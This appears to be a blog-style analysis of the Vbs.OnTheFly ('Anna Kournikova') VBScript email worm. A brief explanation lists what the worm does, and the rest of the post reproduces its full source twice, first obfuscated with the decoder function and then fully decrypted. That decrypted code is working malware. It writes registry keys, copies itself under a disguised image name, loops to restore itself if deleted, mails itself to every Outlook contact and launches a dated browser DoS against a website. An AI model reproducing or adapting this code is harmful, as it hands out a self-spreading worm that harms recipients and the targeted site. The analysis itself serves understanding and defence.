I woke up today to find about three zillion copies of the Vbs.OnTheFly virus in my inbox. I can't believe people are still stupid enough to run attachments with ".vbs" extensions. Anyway, I set about decrypting the virus and figuring out what it does, so here are my results.

Basically, it's a very simple virus. The second line is an "Execute" line that actually contains the virus itself. The rest of the script is the function used to decrypt the code before running it.

When you look at the decrypted code, you'll notice that it does four things:

  1. Writes a registry setting that tells the virus it has been executed.
  2. Saves the virus to a file (AnnaKournikova.jpg.vbs).
  3. Checks to see if it's January 26. If so, opens a browser and sends you to http://www.dynabyte.nl (this is a DOS attack on a site, it is not the homepage of the virus author).
  4. Sends copies of itself to everyone in your Outlook address book.

In case you're curious, the text it puts in your registry on line 5 is "Worm made with Vbswg 1.50b".


The original virus (linebreaks added to save your browser's sanity):
'Vbs.OnTheFly Created By OnTheFly
Execute e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqt
    tgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+
    $9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(
    jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9
    ;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE
    *t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(
    Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5
    (Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$t
    erkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veukt
    vrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwk
    pqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg
    {no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqj
    vp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
    {fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVi
    p7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiM
    yUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQocl
    Vip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R
    2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV
    wt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpK
    hNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvU
    vgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54
    xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0v
    gcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuv
    qHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0Tf
    CtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?TLo4uR4OoD0TfCtf
    ugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUv
    gk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?
    TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0
    q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g
    =+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$
    #(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuY
    sp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMt
    wkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk
    496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ9v58Jr7R6t
    0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvz
    pGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
Function e7iqom5JE4z(hFeiuKrcoj3)
For I = 1 To Len(hFeiuKrcoj3) Step 2
StTP1MoJ3ZU= Mid(hFeiuKrcoj3, I, 1)
WHz23rBqlo7= Mid(hFeiuKrcoj3, I + 1, 1)
If Asc(StTP1MoJ3ZU) = 15 Then
StTP1MoJ3ZU= Chr(10)
ElseIf Asc(StTP1MoJ3ZU) = 16 Then
StTP1MoJ3ZU = Chr(13)
ElseIf Asc(StTP1MoJ3ZU) = 17 Then
StTP1MoJ3ZU = Chr(32)
Else
StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
End If
If WHz23rBqlo7<> "" Then
If Asc(WHz23rBqlo7) = 15 Then
WHz23rBqlo7= Chr(10)
ElseIf Asc(WHz23rBqlo7) = 16 Then
WHz23rBqlo7= Chr(13)
ElseIf Asc(WHz23rBqlo7) = 17 Then
WHz23rBqlo7= Chr(32)
Else
WHz23rBqlo7= Chr(Asc(WHz23rBqlo7) - 2)
End If
End If
e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
Next
End Function
'Vbswg 1.50b


The (rather easily) decrypted virus:
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next

Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) 
& Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & 
Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & 
Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)

Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"

if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
    e2nSA7HlgLC()
end if

if month(now) =1 and day(now) =26 then
    E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if

Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close

Do
    If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
        Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
        UeI22z8P4v0.writeZN5JKZ4xiuV
        UeI22z8P4v0.Close
    End If
Loop

Function e2nSA7HlgLC()
    On Error Resume Next
    Set D23OvxM6KRH = CreateObject("Outlook.Application")
    
    If D23OvxM6KRH= "Outlook"Then
        Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
        Set S6k211ge33L= j25tNZB9f8l.AddressLists

        For Each JR2mPsM2BmR In S6k211ge33L
            If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
                d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
                
                For X789Va3zRez= 1 To d4BD3xgwv1J
                    Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
                    Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
                    iq72b483v3Z.To = OIE4BVYjOJ8.Address
                    iq72b483v3Z.Subject = "Here you have, ;o)"
                    iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
                    set fWsnq8YG9f1=iq72b483v3Z.Attachments
                    fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
                    iq72b483v3Z.DeleteAfterSubmit = True
                    
                    If iq72b483v3Z.To <> "" Then
                        iq72b483v3Z.Send
                        E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
                    End If
                Next

            End If
        Next
    end if
End Function
'Vbswg 1.50b